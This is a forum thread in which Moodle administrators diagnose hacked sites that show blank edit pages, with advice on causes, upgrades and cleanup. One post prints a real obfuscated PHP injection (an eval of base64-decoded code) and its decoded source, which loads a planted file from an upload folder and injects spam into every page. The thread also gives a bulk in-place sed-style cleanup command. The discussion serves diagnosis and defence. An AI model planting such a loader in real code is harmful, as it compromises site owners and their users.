Hello,
I work for a school district and we've been running moodle for a while now with really no problems at all.
But just recently we noticed when we go into a course and then try to edit something that was assigned to that course it just brings up a blank page.
Not sure why. There is no error just a blank page.
We haven't upgraded Moodle at all... just wondered if anyone else has worked through this issue or one like it.
Thanks!
N.
Tonnie,
Have you checked your PHP files for infection? Open up any of the PHP files in the Moodle folder such as config.php or index.php and check at the very top of the file.
Is there a long line of junk code at the top? If so then you're infected / corrupted / hacked, and you'll have to restore good copies of those files if you have them in a backup.
I just did this and now we're working fine.
Matt
Is it the server or moodle get infected / corrupted / hacked?
How to prevent this from happening again?
In order to show you the most relevant results, we have omitted some entries very similar to the 2 already displayed.
If you like, you can repeat the search with the omitted results included.
See reply from Angelo Gagliani on thurs feb 12. how to diagnose a hacked moodle site
same problem. this fixed it.
Hacked code had been dropped in a ramdom folder on my server and somehow moodle was pointed to it when i clicked on the edit or move buttons, etc.
the folder it was in was unnecessary, so when i renamed it and restarted apache, etc, all was ok.
in this process, i also brought moodle and php veresions current, which i understand closed the vulnerability (for now!)
hackers should be........
Hi Bob,
fixed and closed 
... it's probably true in most cases but there have been about 20 similar threads like http://moodle.org/mod/forum/discuss.php?d=111710
during the last months and it's not totally sure that your case or any one of those 4000 attacked sites really "work ok" - or cases have been "fixed".
You can fix the known security holes, delete files, change permissions, upgrade all your programs, close all known vulnerabilities and still can't be 100% sure it was enough. For example if the attacker has used a tool like c99madshell he/she/it (bot) got access to your database and could have stolen all email addresses, usernames and passwords from your site. Those can be used against other sites and if you use same usernames on several sites the bots may get access to all your sites. If you use same username and password for your server/CPanel/ftp/ etc the cracker may get access to all the same files that you have access... + if other users have included their homepages to user profiles etc the attacker gets soon access to 500 servers more and does not need to use tools like c99madshell anymore... and it's just a start for stealing identities etc for professional spammers and crackers. Some of the attackers are paid criminals who know what to search and what to use... and some are just school boys searching for adventure.
Well... encryption can slow down crackers from getting the actual password but does not quarantee anything. When www.phpbb.com was cracked a couple of weeks ago details for more than 400,000 accounts were intercepted, including names, email addresses and hashed passwords. The writer created a script that was able to break more than 28,000 passwords which were hashed using MD5 algorithm in a couple of hours and published all that data in internet to proove the method.
It's just a matter of time how long the script must check different passwords to get them right if username is known.
Edit: And in the case of c99madshell the cracker does have direct access to database, he/she can take a dump file, he/she can read config.php (password there is not encrypted) and in addition to this attacker has full access to any web accessible files on server - he/she can read them but can't write to them if they do not allow writing... Jamie - check http://www.derekfountain.org/security_c99madshell.php if you have not read it.
I suppose you keep all doors open and welcome all strangers, Howard... 
I keep my doors and windows locked when I'm not at home. If I hear someone ringing at the door I do open the door - if someone would try to come in from other route I would probably not ask who they are - I would kick them to ***.
I am having the same problem. I get a blank page when I click edit in the Topics section. I cannot delete or hide a file either. I can create new resources. Unfortunately due to my lack of tech skills I do not know how to access the Activities Block as suggested or what a PHP file is and where to locate them. Yes, I am a disaster, and I am also desperate. Classes begin next week and I need to make some changes.
I am using Moodle 1.8.
Thanks for any help you can give me......camille
Camille,
you did not mention the site but using your name and moodle google gave at least one site (Art and Visual Culture in Modern Life) that does have similar hidden div tags in source code like several other hacked sites during last months http://moodle.org/mod/forum/discuss.php?d=111710 - I simply clicked your Site news and checked source code from browser - and noticed right away after body tags <div style="position:absolute;left:-69982px;top:-56983px">...
You will probably need to clean or replace all php files of your moodle although index.php looked untouched - maybe it's a new trick.
If you can you should upgrade your 1.8 site to latest version of 1.8.x or 1.9.4+ that has a security overview report available in administration menu and you can see most settings that need to be changed to make your site more secure.
Thanks for checking my site. You did find it.
I'm afraid that I do not know how to access the php index or, to be honest, what they are. I looked at the Source Code while I had my news post open and didn't see what you are referring too. I have no idea of how to clean or replace the php files if I ever find them. Fixing this could be way above my ability. Have you any suggestions for this totally techno idiot?
Now this is getting interesting - the hacked code was there in source yesterday when I visited your site and now it's gone.
If you did not find it and change anything... did you install moodle yourself or did your host/some other person install it?
There are several ways to upgrade - basicly you just need to replace the old files of moodle with the new files and add the old config.php (with correct paths) and upgraded 3rd party activities/themes if you have them.
You need to have access to your server anyway.
Camille,
it looks like your host has already done major part of cleaning - if tech service of Site Ground can do also upgrading it might be the easiest solution (some extra cost of course)
Many hosted sites have either ftp (ssh) or Cpanel access to files and it is possible to delete, upload, move,...files and folders, change permissions etc. If you have never done this contacting to your host might be the best start.
I too haven't upgraded Moodle at all. I am still running version 1.5.2 because a backup of a course is not possible, moodle just stops after printing part of the backup progress. Version 1.5.2 has been working well for me otherwise so I left until I could get a better solution. No as of last week this editing probelm suddenly appeared. Now I am getting worried, but as far as the students are concerned everything, seems to be working OK.
I have no idea to check if my site might be hacked.I am also using siteground as my host.
Tim,
I can unfortunately say that also your site has been hacked, it is very easy. Just use google - your name and moodle or some nasty words - or check source code...
If you read source code (browser) you should find after body tags
<div style="position:absolute;height:0px;overflow:hidden;"> and a lot of spam.
There are a lot of similar cases - sites that have been hacked during the last months - because they are old, never upgraded and have insecure settings that allow crackers and spammers to add their code to php files. I collected some of those links to
http://moodle.org/mod/forum/discuss.php?d=116374
If upgrading is too hard you could also install a fresh version 1.9.4+ of moodle and try to move old courses with course backup/restore to a new moodle - and check that attachments do not have the spam code with them...
Maybe siteground has left register_globals on by default...?
Hi Jeff,
In Tim's and Camille's case I visited their sites before replies to be sure what's going on. Those tags were from their sites, they are not the same for all hacked sites. I can't find any hacked code or spam from your site but there are many other reasons for possible blank pages - the reason is not always cracker or spammer
http://docs.moodle.org/en/Installation_FAQ#Why_is_a_particular_page_blank_or_incomplete.3F
Have you checked server error logs - maybe there is some problem with subfolders of moodledata/uploaddata (changed permissions, folders are not there where moodle tried to find them (using the links from database)... or something like http://moodle.org/mod/forum/discuss.php?d=113686 (Fantastico)
Edit: ...and even in this last case David's previous site /public_speaking was clearly hacked (links found with google - hopefully he has checked all settings), his current site /speech looks clean.
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9lbGVjdHJpMS9wdWJsaWNfaHRtbC91cGxvYWRkYXRhLzYvbW9kZGF0YS9hc3NpZ25tZW50LzgxLzQxNS9tZGxfdXRmLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2VsZWN0cmkxL3B1YmxpY19odG1sL3VwbG9hZGRhdGEvNi9tb2RkYXRhL2Fzc2lnbm1lbnQvODEvNDE1L21kbF91dGYucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
Using using the base64 decoder at <http://www.motobit.com/util/base64-decoder-encoder.asp>;)
I found that this decodes to:
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/electri1/public_html/uploaddata/6/moddata/assignment/81/415/mdl_utf.php')){include_once('/home/electri1/public_html/uploaddata/6/moddata/assignment/81/415/mdl_utf.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}
So I think my moodle site has been hacked ! Ug !
I know I have been amiss in not upgrading from the current version of moodle (1.5.2).
but I have been stuck for two reasons:
1. When I tried to upgrade two years ago using the fantastico, it completely garbled the
MYSQL database. Fortunately the webhost (siteground) was able to restore from
a recent backup. This caused me days of stress and frustration.
2. When I try to backup a course, Moodle prints a list of backup actions and then just
stops with "done" displayed on the bottom of the browser. Without a course backup
I cannot transfer it to a new installation.
3. Moodle 1.5.2 has been working well otherwise, until now.
It is still working except for the ability to edit courses. Whenever I click on an edit, move, or delete icon,
I get a blank page.
Should just edit the line out of the PHP files ?There are 3 main reasons - read that http://moodle.org/mod/forum/discuss.php?d=111710 :
- permissions allow writing to files that are directly web accessible (inside main folder of moodle or moodledata/uploaddata is inside webroot)
- register globals setting of php is enabled and allows remote file attacks
- moodle is not up-to-date and attackers can use old vulnerabilities that have been fixed in the latest versions of moodle
Fresh start might be reasonable. If you can take course backups try to install a fresh moodle 1.9.4+ package without Fantastico from http://download.moodle.org/ as a parallel moodle (download/upload the package, use different names for moodle and moodledata and either different database or different prefix in config.php if you have only one database. If you get it installed you might be able to restore old courses directly to moodle 1.9.4+ with course restore feature.
Fantastico installs and core packages from moodle.org do not have exactly the same folder structure so "normal" upgrading can be a long process and you need to take full backups from both database and moodledata (uploaddata) because many things can fail.
It is - and particularly with Fantastico. http://docs.moodle.org/en/Upgrading is not really written for Fantastico installs - that's why I suggested installing another moodle to another folder from http://download.moodle.org/ and using course backups/restores if it just works... http://docs.moodle.org/en/Course_backup
Another point is that attacker may have taken a dump of database and may know all usernames and passwords so a new install is always more secure than parsing old hacked site.
Because steps get mixed each time you use different versions of Fantastico 
A nice flash tutorial built by Eric Hagley demonstrates how to upgrade Moodle on your web hosting service without using Fantastico http://englishforum.sgu.ac.jp/moodle/mod/resource/view.php?id=387
In many cases it just does not work that way - there may be unicode migration problems with database/tables, user images may be lost (different location)... and the advice to not use Fantastico is not very helpful if you only want to use one-click solutions...
I guess the main problem is that what ever system you use you should upgrade regularly or procedures may change and fail.
<?php /**/eval(base64_decode('aWYo......
script. That is over a thousand files !
I must find a way to get rid of the first line in every *.php file.
No, it does not need to be a student. If crackers know old vulnerabilities (in any programs - most CMS, gallery, forum etc programs that allow users to upload files or update data have had similar attacks for years) and settings of php & permissions of files and folders are wrong or input of users is not properly sanitized they can inject first files directly.
grep -R --files-with-matches 'eval(base64_decode' . | sort | uniq | xargs perl -pi -e 's/^.*eval\(base64\_decode\(.*[\n\r]*//mg'With that c99madshell mentioned in previous link or some similar script - it's like a file manager that gives attacker full access to your files if he/she gets in. First he/she needs just to upload/modify two files to get in and when route is open it does not take long to get access to all php files - if they are writable.
Security overview report http://docs.moodle.org/en/Security_overview should control in the future that most security settings can be checked by administrator.
